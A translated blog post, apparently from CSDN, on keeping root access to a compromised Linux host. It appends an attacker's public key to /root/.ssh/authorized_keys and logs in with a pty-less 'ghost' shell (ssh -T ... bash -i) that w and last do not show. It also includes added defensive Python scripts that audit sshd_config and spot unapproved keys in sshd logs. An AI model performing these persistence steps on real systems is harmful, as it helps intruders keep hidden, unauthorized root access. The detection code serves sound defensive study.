Logging in to Linux hosts directly with public keys when no password is available

0x00 Premise

  • An old trick from the past, dug out to fill a post
  • The usual situation: root on the target Linux host has already been obtained through RCE, privilege escalation, and so on
  • The main problem is that there is no password, the hash cannot be cracked, and the machine has no normal outbound network access
  • So a forward connection can be tried

0x01 On the target host, modify the SSH service configuration

Enable SSH public-key login and restart the SSH service

# RSAAuthentication only ever applied to SSH protocol 1; sshd 7.4 and later warns about it and ignores it
echo RSAAuthentication yes >> /etc/ssh/sshd_config
# public-key authentication (already the OpenSSH default)
echo PubkeyAuthentication yes >> /etc/ssh/sshd_config
systemctl restart sshd
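The appended directives above behave in a way worth checking: sshd takes the first value it reads for a keyword and ignores later ones, and any line appended to the end of the file lands inside a trailing Match block if one exists. The following Python script is an added example, not code from the original post. It parses an sshd_config (a constructed sample is embedded), reports the effective global value of each keyword, and flags shadowed duplicates, directives scoped to a Match block, and deprecated protocol-1 options such as RSAAuthentication.

```python
import re
from collections import OrderedDict

# Constructed sample: a baseline that already sets the keywords, a Match block,
# and two lines appended afterwards the way `echo ... >> sshd_config` does it.
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication no
PasswordAuthentication yes
Match User deploy
    PubkeyAuthentication yes
RSAAuthentication yes
PubkeyAuthentication yes
"""

# SSH protocol-1 options: sshd 7.4 and later logs a deprecation warning and ignores them.
DEPRECATED = {"rsaauthentication", "rhostsrsaauthentication"}

# keyword, then either "=" or whitespace, then the value
_DIRECTIVE = re.compile(r"^([A-Za-z0-9]+)(?:\s*=\s*|\s+)(.*?)\s*$")


def parse_sshd_config(text):
    """Split an sshd_config into its global section and its Match blocks.

    Returns (globals_, matches):
      globals_ : keyword (lowercased) -> [(line_no, value), ...] in file order
      matches  : [(line_no, criteria, {keyword: [(line_no, value), ...]}), ...]
    """
    globals_, matches, current = OrderedDict(), [], None
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        key, val = m.group(1).lower(), m.group(2)
        if key == "match":                       # every later line is scoped to this block
            current = (n, val, OrderedDict())
            matches.append(current)
            continue
        bucket = globals_ if current is None else current[2]
        bucket.setdefault(key, []).append((n, val))
    return globals_, matches


def effective_global(globals_, keyword):
    """sshd uses the FIRST value it reads for a keyword; later duplicates are ignored."""
    vals = globals_.get(keyword.lower())
    return vals[0][1] if vals else None


def audit(text):
    """Findings: shadowed duplicates, lines that landed inside a Match block, deprecated keywords."""
    globals_, matches = parse_sshd_config(text)
    findings = []
    for key, vals in globals_.items():
        first_line, first_val = vals[0]
        for n, val in vals[1:]:
            findings.append(f"line {n}: {key} {val} is ignored; line {first_line} already "
                            f"set it to {first_val!r} (first value wins)")
    for start, criteria, block in matches:
        for key, vals in block.items():
            for n, val in vals:
                findings.append(f"line {n}: {key} {val} is scoped to 'Match {criteria}' "
                                f"(line {start}) and does not change the global setting")
    scoped = [kv for _, _, block in matches for kv in block.items()]
    for key, vals in list(globals_.items()) + scoped:
        if key in DEPRECATED:
            for n, _ in vals:
                findings.append(f"line {n}: {key} is a protocol-1 option; sshd 7.4+ "
                                f"warns about it and ignores it")
    return findings


if __name__ == "__main__":
    g, _ = parse_sshd_config(SAMPLE_SSHD_CONFIG)
    for kw in ("PubkeyAuthentication", "PasswordAuthentication", "PermitRootLogin"):
        print(f"effective {kw}: {effective_global(g, kw)}")
    for finding in audit(SAMPLE_SSHD_CONFIG):
        print(finding)
```

Run it against a real file with `audit(open("/etc/ssh/sshd_config").read())`; the parser deliberately ignores Include directives and quoted values, which sshd supports, so treat its output as a first pass rather than a full reimplementation of sshd's config logic.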

0x02 Generate the key pair on local Linux

# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa

Note: this step is best done on a clean Linux build, because the comment at the end of the generated public key records your username and hostname


# locate id_rsa.pub and copy it out yourself
ls -al /root/.ssh/
cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/
# set permissions
chmod 777 /home/xxxx/Desktop/id_rsa.pub

There are two files in the /root/.ssh/ folder:

id_rsa (private key)
id_rsa.pub (public key)

0x03 Write the public key onto the Linux target

  1. Upload the public key to the intranet Linux host yourself, save it in the /root/.ssh/ directory and rename it authorized_keys, or append it with echo through command execution

  2. If authorized_keys already exists on the target, just append to the end of it

  3. Note: back up the original authorized_keys before operating, in case something goes wrong.

# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= [email protected] >> /root/.ssh/authorized_keys

0x04 "Ghost" login

ssh -T [email protected] /usr/bin/bash -i
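Taking the appended authorized_keys entry from 0x03 and the login above together from the defensive side: the following Python script is an added example, not code from the original post. It computes OpenSSH's SHA256 fingerprint for each authorized_keys entry (base64 of the SHA-256 of the decoded key blob with the padding stripped, the same value ssh-keygen -lf prints), compares the entries against a baseline of approved fingerprints, and correlates sshd's "Accepted publickey" log lines with the entry they used. A session started with ssh -T and a shell command allocates no pty, so w and last do not list it, but sshd still logs the accepted key and its fingerprint. The keys, the baseline and the log lines are constructed for the demo; the key blobs are toy SSH wire-format blobs, not real RSA or Ed25519 keys.

```python
import base64
import hashlib
import re
import struct

KEY_TYPES = {"ssh-rsa", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def _ssh_string(b):
    """SSH wire encoding of a byte string: 4-byte big-endian length, then the bytes."""
    return struct.pack(">I", len(b)) + b


def toy_blob(key_type, *fields):
    """Constructed base64 key blob: the type string followed by wire-encoded fields.
    A real key carries a real modulus or curve point here; the fingerprint math is the same."""
    parts = (key_type.encode(),) + fields
    return base64.b64encode(b"".join(_ssh_string(p) for p in parts)).decode()


def parse_key(line):
    """Return (type, base64, comment, options) for one authorized_keys line.
    Options with embedded spaces (e.g. command="a b") are not handled by this simple split."""
    parts = line.strip().split()
    options = ""
    if parts and parts[0] not in KEY_TYPES:     # a leading options field, e.g. no-pty
        options, parts = parts[0], parts[1:]
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        raise ValueError(f"not an authorized_keys entry: {line!r}")
    return parts[0], parts[1], " ".join(parts[2:]), options


def fingerprint(line):
    """SHA256 fingerprint as ssh-keygen -lf prints it: 'SHA256:' + unpadded base64."""
    key_type, b64, _, _ = parse_key(line)
    blob = base64.b64decode(b64)
    (n,) = struct.unpack(">I", blob[:4])         # the blob names its own type first
    if blob[4:4 + n].decode() != key_type:
        raise ValueError("declared key type does not match the key blob")
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


# Constructed data: one approved admin key and one entry appended by hand.
ADMIN_KEY = "ssh-ed25519 " + toy_blob("ssh-ed25519", b"\x11" * 32) + " admin@bastion"
APPENDED_KEY = ("ssh-rsa " + toy_blob("ssh-rsa", b"\x01\x00\x01", b"\x00\xab\xcd\xef")
                + " root@unknown-host")
AUTHORIZED_KEYS = ADMIN_KEY + "\n" + APPENDED_KEY + "\n"
BASELINE = {fingerprint(ADMIN_KEY)}               # in practice: from config management
# Constructed sshd log lines in the format OpenSSH writes to syslog/journal.
SAMPLE_AUTH_LOG = [
    "Oct 13 14:20:36 web01 sshd[2231]: Accepted publickey for root from 10.0.0.5 "
    "port 51234 ssh2: RSA " + fingerprint(APPENDED_KEY),
    "Oct 13 14:21:02 web01 sshd[2240]: Accepted password for deploy from 10.0.0.9 "
    "port 51300 ssh2",
]

_ACCEPTED = re.compile(r"Accepted publickey for (\S+) from (\S+) port (\d+) ssh2: (\S+) (SHA256:\S+)")


def audit_authorized_keys(text, baseline):
    """Split entries into (known, unknown) lists of (fingerprint, type, comment) against a baseline."""
    known, unknown = [], []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        key_type, _, comment, _ = parse_key(line)
        fp = fingerprint(line)
        (known if fp in baseline else unknown).append((fp, key_type, comment))
    return known, unknown


def correlate_logins(log_lines, authorized_keys_text):
    """Map each 'Accepted publickey' line to the authorized_keys comment whose fingerprint it carries."""
    by_fp = {fingerprint(l): parse_key(l)[2]
             for l in authorized_keys_text.splitlines() if l.strip()}
    hits = []
    for line in log_lines:
        m = _ACCEPTED.search(line)
        if m:
            user, src, _port, _alg, fp = m.groups()
            hits.append((user, src, fp, by_fp.get(fp, "<not in authorized_keys>")))
    return hits


if __name__ == "__main__":
    known, unknown = audit_authorized_keys(AUTHORIZED_KEYS, BASELINE)
    for fp, key_type, comment in unknown:
        print(f"NOT IN BASELINE: {key_type} {fp} {comment}")
    for user, src, fp, comment in correlate_logins(SAMPLE_AUTH_LOG, AUTHORIZED_KEYS):
        print(f"{user} from {src} used key {fp} ({comment})")
```

The comment field of an entry is attacker-controlled and proves nothing; the fingerprint is what ties an authorized_keys line to a logged session, which is why the baseline is a set of fingerprints rather than of comments or filenames.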


0x05 Use scp to transfer files without a password

scp -P 22 -r /root/fsacn [email protected]:/usr/tmp/fsacn


Origin blog.csdn.net/god_zzZ/article/details/120751772